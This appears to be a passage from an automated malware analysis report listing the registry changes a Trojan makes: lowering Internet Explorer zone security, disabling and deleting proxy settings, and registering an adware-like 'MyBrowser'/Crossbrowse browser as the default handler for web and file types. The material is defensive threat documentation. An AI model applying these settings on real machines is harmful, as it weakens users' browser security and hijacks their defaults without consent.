"BaseClass" = "Drive"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\CrossBrowser]
"Installation" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 22 74 55 27 E0 3C AF E0 EB D4 30 1D 68 9E 72"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process chrome.exe:2304 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 64 4B A8 29 FD EA EF 2A F8 9A 97 29 57 A9 23"

The process chrome.exe:2268 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 C3 C4 EC 04 6A 3C 23 66 3A 29 9F B0 E7 23 CE"

The process chrome.exe:2216 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 9E 04 10 1F 36 59 98 E9 F7 D8 2A 62 07 1C 40"

The process chrome.exe:1980 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C B3 A0 D8 2C 8A DC D5 DD CF C4 2F 08 04 E3 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Chromium]
"usagestats" = "0"
"_NumAccounts" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"Guid" = "0c5a3172-2248-44fd-b9a6-8389cb1dc56a"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"BitNames" = " DOT11_ASSOCIATE DOT11_ROAMING DOT11_1X DOT11_PNP DOT11_SCAN DOT11_RECEIVE DOT11_SEND DOT11_IOCTL DOT11_OID DOT11_MISC DOT11_UPCALL DOT11_KEYMGR DOT11_PEER DOT11_SOFTAP DOT11_PAM DOT11_REPEATER DOT11_APROUTER DOT11_WME DOT11_CONFIG DOT11_MSM DOT11_MSM_ADAPT DOT11_MSM_SCAN DOT11_MSM_CONNECT DOT11_MSM_SECURITY_PKT DOT11_NOTIFY_OBJECT"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"Guid" = "2e8d9ec5-a712-48c4-8ce0-631eb0c1cd65"

[HKCU\Software\Chromium]
"_NumSignedIn" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\ServiceCtlGuid]
"BitNames" = " DOT11_AUTOCONF DOT11_AUTOCONF_CLIENT DOT11_AUTOCONF_UI DOT11_FATMSM DOT11_COMMON DOT11_WLANGPA DOT11_CLASS_COINSTALLER"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"BitNames" = " WLANHC_AUTOCONFIG WLANHC_RNWFMSM WLANHC_FATMSM WLANHC_DLLMAIN WLANHC_TEST"
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\DiagL2SecCtlGuid]
"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process chrome.exe:2252 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 0D B1 17 4A 1B 1D D1 BA 36 7F 95 C3 A2 EF 69"

The process nsq21.tmp:168 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 0E FD D6 4D 3A C1 62 1C F6 4F 9C 45 66 DB B7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nso13.tmp:508 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 6D F5 DD F2 1F 66 FB 4F EB 85 68 96 BF 04 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 6481.exe:1988 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 12 6B 3B 47 93 71 4E B1 66 55 0C 08 15 4C F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tmp25.tmp:3448 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Macromedia\FlashPlayerPepperReleaseType]
"Release" = "1"

[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"UninstallerPath" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe"
"Version" = "18.0.0.209"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"UninstallString" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe -maintain pepperplugin"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"isScriptDebugger" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"URLUpdateInfo" = "http://www.adobe.com/go/getflashplayer/"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "tmp25.tmp"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"EstimatedSize" = "18748"
"HelpLink" = "http://www.adobe.com/go/flashplayer_support/"
"NoModify" = "1"

"URLInfoAbout" = "http://www.adobe.com"
"VersionMinor" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_18_0_0_209_pepper.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"DisplayVersion" = "18.0.0.209"
"DisplayName" = "Adobe Flash Player 18 PPAPI"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D EB 7C 00 89 35 00 8C 11 89 CB 0A 3C 14 95 F4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"VersionMajor" = "18"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Macromedia\FlashPlayerPepper]
"PlayerPath" = "%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"Publisher" = "Adobe Systems Incorporated"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Extended Properties\{2CA4F306-B280-4ab2-B5E1-1DFA3583F046}\%System%]
"FlashPlayerCPLApp.cpl" = "10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player PPAPI]
"RequiresIESysFile" = "4.70.0.1155"
"DisplayIcon" = "%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Macromedia\FlashPlayer]
"ConflictingProcs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Macromedia\FlashPlayer]
"RerunInUIMode"

The process setup.exe:576 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"

[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"

[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20151029"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"

[HKCR\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"

[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser,"

[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"

[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"

[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"

[HKCR\https\shell]
"(Default)" = "open"

[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"

[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
